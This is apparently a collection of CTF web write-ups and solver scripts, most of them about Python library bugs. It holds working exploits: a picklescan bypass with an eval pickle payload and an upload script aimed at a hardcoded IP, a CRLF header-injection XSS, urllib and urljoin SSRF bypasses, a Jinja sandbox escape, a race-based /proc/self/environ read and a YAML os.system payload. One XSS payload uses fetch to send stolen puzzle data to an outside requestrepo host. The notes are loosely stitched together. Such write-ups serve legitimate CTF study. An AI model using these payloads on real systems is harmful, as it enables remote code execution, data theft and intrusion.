pickle scan vulnerabilty bypassing the pickle check
| Event Name | Lilac CTF |
| GitHub URL | - |
| Challenge Name | Nailong |
Attachments
References
tl;dr
English Version
Analysis
The app is a Streamlit-based PyTorch model loader. It loads models with:
model.load_state_dict(torch.load(model_path, map_location='cpu', weights_only=False))
It also runs picklescan to block malicious pickles.
Vulnerability
We exploit duplicate filenames inside a ZIP archive:
So we craft a .pt (ZIP) containing two data.pkl files:
Exploit Idea
- The first one runs eval and reads /flag (or common paths).
- The second is benign (empty dict).
Payload Core
class RCE: def reduce(self): return (eval, (expr,))
malicious_obj = {RCE(): 1}
Reproduction
python3 upload_model.py --model payload2.pt --alert-timeout 10
Output shows:
Unexpected key(s) in state_dict: "LilacCTF{...}"
———
sender
#!/usr/bin/env python3
"""Upload a model file to the Streamlit app and click Load.
Usage:
python3 upload_model.py --model /path/to/model.pt
"""
from __future__ import annotations
import argparse
import asyncio
import os
import sys
import time
import uuid
from typing import Dict, List, Tuple
import requests
import websockets
# Local stub package with Streamlit protobufs lives under ./streamlit/proto
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
from streamlit.proto import BackMsg_pb2 # noqa: E402
from streamlit.proto import ClientState_pb2 # noqa: E402
from streamlit.proto import Common_pb2 # noqa: E402
from streamlit.proto import ForwardMsg_pb2 # noqa: E402
from streamlit.proto import WidgetStates_pb2 # noqa: E402
DEFAULT_BASE_URL = "http://1.95.143.126:8501"
DEFAULT_MODEL_UPLOADER_ID = "$$ID-ec0db5155bb0a870f99e011bf30119ed-None"
DEFAULT_LOAD_BUTTON_ID = "$$ID-629307a2f0065ee403debe3206fdc90d-load_button"
def _clear_proxy_env() -> None:
for key in ("http_proxy", "https_proxy", "HTTP_PROXY", "HTTPS_PROXY"):
os.environ.pop(key, None)
os.environ["NO_PROXY"] = "*"
def _get_xsrf_cookie(base_url: str) -> str:
url = base_url.rstrip("/") + "/_stcore/health"
resp = requests.get(url, timeout=10, proxies={"http": None, "https": None})
resp.raise_for_status()
cookie = resp.cookies.get("_streamlit_xsrf")
if not cookie:
raise RuntimeError("_streamlit_xsrf cookie not found; check connectivity")
return cookie
def _parse_forward_msgs(raw: bytes) -> List[ForwardMsg_pb2.ForwardMsg]:
msgs: List[ForwardMsg_pb2.ForwardMsg] = []
lst = ForwardMsg_pb2.ForwardMsgList()
try:
lst.ParseFromString(raw)
except Exception:
lst = None
if lst and lst.messages:
return list(lst.messages)
fwd = ForwardMsg_pb2.ForwardMsg()
fwd.ParseFromString(raw)
msgs.append(fwd)
return msgs
def _pick_model_uploader(file_uploaders: List[Tuple[str, str]]) -> str | None:
for wid, label in file_uploaders:
l = (label or "").lower()
if "model" in l or "weight" in l or "pth" in l or "pt" in l:
return wid
if len(file_uploaders) == 1:
return file_uploaders[0][0]
return None
def _pick_load_button(buttons: List[Tuple[str, str]]) -> str | None:
for wid, label in buttons:
l = (label or "").lower()
if "load" in l:
return wid
if "load_button" in wid:
return wid
if len(buttons) == 1:
return buttons[0][0]
return None
async def _bootstrap(
ws, base_url: str, timeout: float = 6.0
) -> Tuple[str, str, List[Tuple[str, str]], List[Tuple[str, str]]]:
back = BackMsg_pb2.BackMsg(rerun_script=ClientState_pb2.ClientState())
await ws.send(back.SerializeToString())
session_id = ""
page_script_hash = ""
file_uploaders: List[Tuple[str, str]] = []
buttons: List[Tuple[str, str]] = []
deadline = time.time() + timeout
while time.time() < deadline:
try:
raw = await asyncio.wait_for(ws.recv(), timeout=deadline - time.time())
except asyncio.TimeoutError:
break
if isinstance(raw, str):
raw = raw.encode("utf-8")
for fwd in _parse_forward_msgs(raw):
if fwd.HasField("new_session"):
session_id = fwd.new_session.initialize.session_id
page_script_hash = fwd.new_session.page_script_hash
if fwd.HasField("delta") and fwd.delta.HasField("new_element"):
el = fwd.delta.new_element
kind = el.WhichOneof("type")
if kind == "file_uploader":
fu = el.file_uploader
file_uploaders.append((fu.id, fu.label))
elif kind == "button":
btn = el.button
buttons.append((btn.id, btn.label))
if not session_id:
raise RuntimeError("Failed to obtain session_id from new_session")
if not page_script_hash:
raise RuntimeError("Failed to obtain page_script_hash from new_session")
return session_id, page_script_hash, file_uploaders, buttons
async def _request_file_urls(ws, session_id: str, filename: str) -> Common_pb2.FileURLs:
request_id = uuid.uuid4().hex
req = Common_pb2.FileURLsRequest(
request_id=request_id, file_names=[filename], session_id=session_id
)
back = BackMsg_pb2.BackMsg(file_urls_request=req)
await ws.send(back.SerializeToString())
deadline = time.time() + 6.0
while time.time() < deadline:
raw = await asyncio.wait_for(ws.recv(), timeout=deadline - time.time())
if isinstance(raw, str):
raw = raw.encode("utf-8")
for fwd in _parse_forward_msgs(raw):
if fwd.HasField("file_urls_response"):
resp = fwd.file_urls_response
if resp.response_id != request_id:
continue
if resp.error_msg:
raise RuntimeError(f"file_urls_response error: {resp.error_msg}")
if not resp.file_urls:
raise RuntimeError("file_urls_response empty")
return resp.file_urls[0]
raise RuntimeError("Timed out waiting for file_urls_response")
def _normalize_url(base_url: str, url: str) -> str:
if url.startswith("http://") or url.startswith("https://"):
return url
if not url.startswith("/"):
return base_url.rstrip("/") + "/" + url
return base_url.rstrip("/") + url
def _upload_file(base_url: str, upload_url: str, path: str, xsrf_cookie: str) -> None:
upload_url = _normalize_url(base_url, upload_url)
filename = os.path.basename(path)
headers = {
"X-Xsrftoken": xsrf_cookie,
"Cookie": f"_streamlit_xsrf={xsrf_cookie}",
}
with open(path, "rb") as f:
resp = requests.put(
upload_url,
files={filename: f},
timeout=30,
proxies={"http": None, "https": None},
headers=headers,
)
if resp.status_code >= 400:
# fallback to generic field name if server rejects filename field
with open(path, "rb") as f:
resp = requests.put(
upload_url,
files={"file": (filename, f)},
timeout=30,
proxies={"http": None, "https": None},
headers=headers,
)
resp.raise_for_status()
async def _trigger_load(
ws,
page_script_hash: str,
base_url: str,
uploader_id: str,
load_button_id: str,
filename: str,
file_id: str,
file_size: int,
) -> None:
file_info = Common_pb2.UploadedFileInfo(
id=0, name=filename, size=file_size, file_id=file_id
)
fu_state = Common_pb2.FileUploaderState(
max_file_id=1, uploaded_file_info=[file_info]
)
widget_states = WidgetStates_pb2.WidgetStates()
fu_widget = WidgetStates_pb2.WidgetState(id=uploader_id)
fu_widget.file_uploader_state_value.CopyFrom(fu_state)
widget_states.widgets.append(fu_widget)
load_widget = WidgetStates_pb2.WidgetState(id=load_button_id, trigger_value=True)
widget_states.widgets.append(load_widget)
client_state = ClientState_pb2.ClientState(
page_script_hash=page_script_hash,
widget_states=widget_states,
)
client_state.context_info.url = base_url.rstrip("/") + "/"
back = BackMsg_pb2.BackMsg(rerun_script=client_state)
await ws.send(back.SerializeToString())
async def _collect_alerts(ws, timeout: float = 6.0) -> List[str]:
alerts: List[str] = []
deadline = time.time() + timeout
while time.time() < deadline:
try:
raw = await asyncio.wait_for(ws.recv(), timeout=deadline - time.time())
except asyncio.TimeoutError:
break
except Exception:
break
if isinstance(raw, str):
raw = raw.encode("utf-8")
for fwd in _parse_forward_msgs(raw):
if fwd.HasField("delta") and fwd.delta.HasField("new_element"):
el = fwd.delta.new_element
kind = el.WhichOneof("type")
if kind == "alert":
body = el.alert.body.strip()
if body:
alerts.append(body)
return alerts
async def _run(args: argparse.Namespace) -> int:
_clear_proxy_env()
base_url = args.base_url.rstrip("/")
cookie = _get_xsrf_cookie(base_url)
ws_url = base_url.replace("http://", "ws://").replace("https://", "wss://")
ws_url = ws_url + "/_stcore/stream"
headers = {
"Cookie": f"_streamlit_xsrf={cookie}",
"Origin": base_url,
}
async with websockets.connect(
ws_url,
additional_headers=headers,
max_size=None,
ping_interval=None,
open_timeout=10,
) as ws:
session_id, page_script_hash, file_uploaders, buttons = await _bootstrap(ws, base_url)
uploader_id = args.model_uploader_id or _pick_model_uploader(file_uploaders)
load_button_id = args.load_button_id or _pick_load_button(buttons)
if not uploader_id:
uploader_id = DEFAULT_MODEL_UPLOADER_ID
if not load_button_id:
load_button_id = DEFAULT_LOAD_BUTTON_ID
if args.verbose:
print("Session:", session_id)
print("page_script_hash:", page_script_hash)
print("file_uploaders:", file_uploaders)
print("buttons:", buttons)
print("using uploader_id:", uploader_id)
print("using load_button_id:", load_button_id)
filename = os.path.basename(args.model)
file_urls = await _request_file_urls(ws, session_id, filename)
_upload_file(base_url, file_urls.upload_url, args.model, cookie)
await _trigger_load(
ws,
page_script_hash,
base_url,
uploader_id,
load_button_id,
filename,
file_urls.file_id,
os.path.getsize(args.model),
)
alerts = await _collect_alerts(ws, timeout=args.alert_timeout)
if alerts:
print("\n".join(alerts))
else:
print("No alerts received (check the web UI for results).")
return 0
def main() -> int:
parser = argparse.ArgumentParser(description="Upload model and click Load")
parser.add_argument("--model", required=True, help="Path to model file")
parser.add_argument(
"--base-url", default=DEFAULT_BASE_URL, help="Streamlit base URL"
)
parser.add_argument("--model-uploader-id", default="", help="Override uploader widget id")
parser.add_argument("--load-button-id", default="", help="Override load button widget id")
parser.add_argument("--alert-timeout", type=float, default=6.0)
parser.add_argument("--verbose", action="store_true")
args = parser.parse_args()
if not os.path.isfile(args.model):
print(f"Model file not found: {args.model}", file=sys.stderr)
return 1
return asyncio.run(_run(args))
if __name__ == "__main__":
raise SystemExit(main())payload
Uvicorn 0day / Nday + Urlib parse 0day + pycache file upload
| Event Name | 0xl4ugh |
| GitHub URL | - |
| Challenge Name | 0xClinic |
Attachments
Uvicorn N-day
Inspiration
This was inspired by an n-day we discovered with @ZeyadZonkorany in Uvicorn (FastAPI dependency).
We reported it a long time ago, but it was ignored.
Vulnerability
The issue leads to CRLF injection due to incorrect regex-based header validation in Uvicorn’s httptools implementation: https://github.com/Kludex/uvicorn/blob/main/uvicorn/protocols/http/httptools_impl.py
HEADER_RE = re.compile(b'[\x00-\x1f\x7f()<>@,;:[]={} \t\\"]')
HEADER_VALUE_RE = re.compile(b"[\x00-\x08\x0a-\x1f\x7f]")Because of incorrect handling of [] inside the character class, validation can be bypassed and malicious bytes can slip through (including CRLF sequences), resulting in CRLF injection.
Exploitation
In our environment, this CRLF bug enabled multiple impacts:
CRLF can break/ignore Content-Security-Policy headers.
CRLF can force headers like:
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'to be treated as part of the body. Then Nginx may fail to interpret the cache directives, caching responses unexpectedly.
CRLF lets an attacker inject arbitrary body content without proper filtering, enabling XSS.
By chaining these, we can trigger an XSS that affects any user who visits /api/health, even unauthenticated users.
urlib parse 0day
Scheme Restriction Bypass (Found ~5 Hours Before the CTF)
Inspiration
It was the morning of the CTF — literally a 0-day XD. We were preparing for a journey, and I was casually hacking while commuting when I found it, so I decided to patch the challenge and include it
Vulnerability
I observed that urllib accepts an “old URL format”: <URL:scheme://host:port?/path?>
Example: <URL:http://google.com>
However, Python’s urlsplit behaves unexpectedly with it:
from urllib.parse import urlsplit
urls = ["<URL:http://google.com>", "google.com", "http://google.com"]
for url in urls:
print(urlsplit(url).scheme if urlsplit(url).scheme else "No scheme")
# No scheme
# No scheme
# httpSo the old format is interpreted as having no scheme by urlsplit, even though urlretrieve will still fetch it as a URL.
The application performs scheme validation like this:
if urlsplit(file_url).scheme in ["data", "http", "https", "ftp"]:
return Response(
content=json.dumps({"status": "error", "message": "Only file:// URLs are allowed"}),
status_code=400,
media_type="application/json",
)
urlretrieve(file_url, UPLOADS_DIR / filename)
return {
"status": "success",
"message": "Document reference accepted",
"filename": filename,
"file_url": file_url,
}So the validator blocks http/https/..., but the “old format” bypasses the check.
Exploit
Using: <URL:http://attacker/anyfile> bypasses the scheme limitation and allows retrieving remote resources.
Note: Another solution was to inject a newline (%0a) at the beginning of the URL to break parsing in the validation logic.
__pycache__ file upload
Inspiration
We wanted to end the chain with a satisfying RCE, so we used Siunam’s technique that leverages writing a malicious .so file into a Python environment.
Vulnerability
At this stage, we have a restricted file upload with path traversal:
To turn arbitrary file write into RCE in Python, one reliable approach is:
.so) files to hijack/override Python import behavior or related mechanismsFull technique details (already documented): https://siunam321.github.io/research/python-dirty-arbitrary-file-write-to-rce-via-writing-shared-object-files-or-overwriting-bytecode-files/
Python3 aiohttp url bypass
| Event Name | equinor ctf 2025 |
| GitHub URL | https://github.com/ept-team/equinor-ctf-2025/tree/main/writeups/web/Yarr! |
| Challenge Name | Yarr! |
Attachments
References
source
#!/usr/bin/env python3
import os
import time
from aiohttp import ClientSession, web
with open("index.html", "r") as f:
index_html = f.read()
def filter_bad_characters(text):
for forbidden_char in ";<=>?@":
text = text.replace(forbidden_char, ".")
return text
async def index(_):
return web.Response(text=index_html, content_type="text/html")
async def fetch_game(request):
game = filter_bad_characters(request.match_info["game"])
async with ClientSession() as session:
try:
async with session.get(f"http://{game}.games.ept:80/") as response:
text = await response.text()
return web.Response(text=text+f" from {response.url}", content_type="text/html")
except Exception as e:
return web.Response(text=f"Error fetching game '{game}': {str(e)}", status=500)
app = web.Application()
app.router.add_get("/", index)
app.router.add_get("/{game:[0-z]+}/", fetch_game)
web.run_app(app, port=8080)
solve
import httpx
import asyncio
from urllib.parse import quote
URL = "http://localhost:8080"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.AsyncClient(base_url=url)
def get(self, path: str) -> httpx.Response:
path = quote(path)
return self.c.get(f"/{path}/")
class API(BaseAPI):
...
async def main():
api = API()
res = await api.get("[:x@marks@the@spot@ept[]]")
print(res.text)
if __name__ == "__main__":
asyncio.run(main())
URLParse urljoin and urlparse bypass
| Event Name | CORCTF 2025 |
| GitHub URL | - |
| Challenge Name | msfrognymize2 |
Attachments
References
def create_file_url(uuid):
file_url = urljoin("http://127.0.0.1:8000", "/" + uuid)
parsed = urlparse(file_url)
if parsed.scheme != "http":
raise ValueError("Invalid sheme")
if parsed.hostname != "127.0.0.1":
raise ValueError("Invalid host")
if parsed.port != 8000:
raise ValueError("Invalid port")
return file_url
>>> a = urljoin("http://127.0.0.1:8000", "/" + "/vps.dimasc.tf:8000\\@127.0.0.1:8000/")
>>> a
'http://vps.dimasc.tf:8000\\@127.0.0.1:8000/'
>>> urlparse(a)
ParseResult(scheme='http', netloc='vps.dimasc.tf:8000\\@127.0.0.1:8000', path='/', params='', query='', fragment='')
>>>
Python3 Treat emoji as one character can lead to another vulnerability, in this case is XSS
| Event Name | IERAE CTF 2025 |
| GitHub URL | - |
| Challenge Name | Slide Sandbox |
References
solve
import base64
URL = "http://34.146.134.179:3000"
URL = "http://web:3000"
JS = b"""
fetch('/puzzles').then(r => r.json()).then(r => {
fetch(`http://l7so0kr8.requestrepo.com/?${r[0].title}`, {mode:'no-cors'})
})
"""
html = f"""
<html>
<body>
<form action="{URL}/create" method="POST">
<input type="hidden" name="title" value="IERAE" />
<input type="hidden" name="template" value="<img src=x onerror=eval(atob('{base64.b64encode(JS).decode()}'))>" />
<input type="hidden" name="answers" value="123456🧩🧩" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
"""
print(html)wu
ans.length is 10 or more. The following snippet confirms this. "😃".split("") fetch('/puzzles/' + (new URLSearchParams(location.search)).get('id'))
.then(r => r.json())
.then(puzzle => {
document.getElementById('title').innerText = puzzle.title;
const ans = puzzle.answers.split('').sort(() => Math.random() - 0.5); // Sometimes the puzzles are impossible. Forgive please.
ans.forEach((v, i) => {
pieces.push(document.createElement("div"));
})
pieces.push(document.createElement("div"))
for (var i = 0; i < frames.length; i++) {
frames[i].addEventListener("click", slide);
frames[i].document.body.appendChild(pieces[i]);
}
ans.forEach((v, i) => {
pieces[i].innerHTML = puzzle.template.replaceAll("{{v}}", v);
})
});XSS caused by elements that doesnt get appended to the DOM is as follows.
document.createElement("div").innerHTML = "<img src=x onerror=console.log('xss')>"
let pieces = Array();
fetch('/puzzles/' + (new URLSearchParams(location.search)).get('id'))
.then(r => r.json())
.then(puzzle => {
document.getElementById('title').innerText = puzzle.title;
const ans = puzzle.answers.split('').sort(() => Math.random() - 0.5); // Sometimes the puzzles are impossible. Forgive please.
ans.forEach((v, i) => {
pieces.push(document.createElement("div"));
})
pieces.push(document.createElement("div"))
for (var i = 0; i < frames.length; i++) {
frames[i].addEventListener("click", slide);
frames[i].document.body.appendChild(pieces[i]);
}
ans.forEach((v, i) => {
pieces[i].innerHTML = puzzle.template.replaceAll("{{v}}", v);
})
});
thats make the innerHTML is appended into non iframe tag
Python3 http.server vulnerable to CRLF Injection
| Event Name | SAS CTF Quals 2025 |
| GitHub URL | - |
| Challenge Name | GigaUpload |
Attachments
References
self.send_response(200)
self.send_header('Content-Disposition', 'attachment')
self.send_header('X-File-Name', filename)
self.send_header('X-File-Encoding', encoding)
self.send_header('X-File-Content-Type', content_type)
self.send_header('X-File-Size', file_size)
self.end_headers()
self.wfile.write(file_content)
solve
import httpx, re
URL = "http://172.26.119.33:4000"
URL_STORAGE = "http://172.26.119.33:4080"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url, timeout=999)
def api_register(self, username, password):
return self.c.post("/api/register", json={
"username": username,
"password": password,
})
def api_login(self, username, password):
return self.c.post("/api/login", json={
"username": username,
"password": password,
})
def api_upload(self, upload_token):
return self.c.post(URL_STORAGE+"/", data="""
------foobar
Content-Disposition: form-data; name="upload_token"
{}
------foobar
Content-Disposition: form-data; name="upload"; filename*=raw_unicode_escape''a\\u000d\\u000aContent-Disposition:attachment\\u000d\\u000aContent-Type:text/html
Content-Type: image/png
<img src=x onerror=alert(1)>
""".format(upload_token).strip()+"\r\n", headers={"Content-Type": "multipart/form-data; boundary=----foobar"})
class API(BaseAPI):
def upload_token(self):
res = self.c.get("/upload")
token = re.findall(r'name="upload_token" value="(.*?)"', res.text)[0]
return token
if __name__ == "__main__":
api = API()
username = "test123123123123"
password = "test123123123123"
res = api.api_register(username, password)
print(res.json())
res = api.api_login(username, password)
print(res.json())
upload_token = api.upload_token()
print(upload_token)
res = api.api_upload(
upload_token=upload_token
)
print(res.text)Python library injection
| Event Name | b01lersc CTF 2025 |
| GitHub URL | - |
| Challenge Name | musicplayer |
Attachments
References
- alternatives:
sitecustomize.py/usercustomize.pyhttps://docs.python.org/3/library/site.html#module-sitecustomize- hook ModuleNotFoundError to find missing imports and overwrite one of those (see
start.py)
asd
fun fact yang easy bisa pakai ipv6 dan itu support scope id seperation
def _split_scope_id(ip_str):
"""Helper function to parse IPv6 string address with scope id.
See RFC 4007 for details.
Args:
ip_str: A string, the IPv6 address.
Returns:
(addr, scope_id) tuple.
"""
addr, sep, scope_id = ip_str.partition('%')
if not sep:
scope_id = None
elif not scope_id or '%' in scope_id:
raise AddressValueError('Invalid IPv6 address: "%r"' % ip_str)
return addr, scope_id
from ipaddress import ip_address
print(ip_address('2001:0db8:85a3:0000:0000:8a2e:0370:7334%&ls'))
in python version 3.10 something you can bypass urlib parse with ” ”
wsgi template injection technique if we can upload PDF with arbitary path control
https://youtu.be/b_pqftkAk9w?t=2149
Jinja using template that
cr3 CTF 2024
import httpx
URL = "https://shippering.1337.sb"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.Client(base_url=url)
def home(self, encoding, person_1, person_2):
return self.c.post("/", data={
"person_1": person_1,
"person_2": person_2,
"method": encoding,
})
class API(BaseAPI):
...
# instance overiding, bypassing jinja sandbox
# because jinja using strict type checking, if the instance checking get modified, it will us can escape jinja sandboxing using something like newline and quote
"""
_isinstance = isinstance
def isinstance_hk(x, y):
f = extract_stack(limit=2)
# Fixing the stupid bugs by myself -_-
if y is not list and len(f) > 0 and 'site-packages' in str(f[0].filename) and not any(
x in str(f[0].filename) for x in [
'fastapi',
'pydantic',
'typing',
'click',
'uvicorn',
'h11',
'starlette',
'multipart',
'slowapi',
'limits',
'lexer',
'nodes',
'visitor',
]
):
return True
return _isinstance(x, y)
isinstance_hk.__globals__['__builtins__']['isinstance'] = isinstance_hk
"""
if __name__ == "__main__":
api = API()
res = api.home("_Renderer__old", "{% if \"True:\n for x in open(\\\"/flag\\\"):\n yield x\n #\" %}{%PERSON2%}{% endif %}", "x")
print(res.text)
H11 Proxy + Starlette
File read with 0 lenght restriction
Project Sekai 2024
belated wu for funny-lfr, intended way to exploit the race is: req a: open_file(/etc/passwd) -> fd=X (any file bigger than environ works
https://github.com/python-hyper/h11/blob/master/h11/_writers.py#L90
) req b: os.stat(/proc/self/fd/X) -> /etc/passwd req a: close fd=X req c: open_file(/proc/self/environ) -> fd=X req b: file.read(/proc/self/fd/X)
from starlette.applications import Starlette
from starlette.routing import Route
from starlette.responses import FileResponse
async def download(request):
return FileResponse(request.query_params.get("file"))
app = Starlette(routes=[Route("/", endpoint=download)])
solver
import sys
import socket
from concurrent.futures import ThreadPoolExecutor
URL = "http://localhost:1337/"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.url = url
self.host, self.port = self._parse_url(url)
def _parse_url(self, url):
parts = url.split("//")[1].split("/")[0].split(":")
host = parts[0]
port = int(parts[1]) if len(parts) > 1 else 80
return host, port
def file(self, path):
return self.make_request("GET", "/", params={"file": path})
class API(BaseAPI):
def make_request(self, method, path, params=None, headers=None, data=None):
query = f"?{'&'.join(f'{k}={v}' for k, v in params.items())}" if params else ""
headers = headers or {"Host": self.host}
request = (
f"{method} {path}{query} HTTP/1.1\r\n"
+ "".join(f"{k}: {v}\r\n" for k, v in headers.items())
+ "\r\n"
+ (data or "")
)
return request.encode()
def file_raw(self, path):
request = self.make_request("GET", "/", params={"file": path})
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((self.host, self.port))
s.sendall(request)
response = []
while True:
data = s.recv(4096)
if not data:
break
response.append(data)
return b"".join(response)
def worker(api, path):
try:
result = api.file_raw(path)
if b"FLAG" in result:
print(result.decode().replace("\r", "").strip())
sys.exit(0)
except Exception as e:
print(f"Error: {e}")
def main():
api = API()
paths = [
"/proc/self/environ", "/etc/passwd", "/proc/self/fd/7",
"/proc/self/fd/8", "/proc/self/fd/9", "/proc/self/fd/10",
"/proc/self/fd/11", "/proc/self/fd/12",
]
with ThreadPoolExecutor(max_workers=50) as executor:
while True:
futures = [executor.submit(worker, api, path) for _ in range(50) for path in paths]
for future in futures:
if future.result() is not None:
return
if __name__ == "__main__":
main()
Yaml deser
payload = {
'file': ('test.txt', b'''!<tag:yaml.org,2002:python/object/apply:os.system> [
\'ls -la / > /dev/shm/testing.txt\',
]''')
}
URL Parse bypass
from urllib.parse import urlparse
from urllib.parse import urlparse
import requests
payload = "http://127.0.0.1:5555\\@www.bssn.go.id/"
url = urlparse(payload)
print(url.hostname)
req = requests.get(payload)
print(req.text)
Pydash cve in flask can gain rce
pydash==5.1.2
https://ctftime.org/writeup/36082
https://adworld.xctf.org.cn/match/list?event_hash=fb6d5b70-beac-11ef-a39b-000c297261bb
su_blog
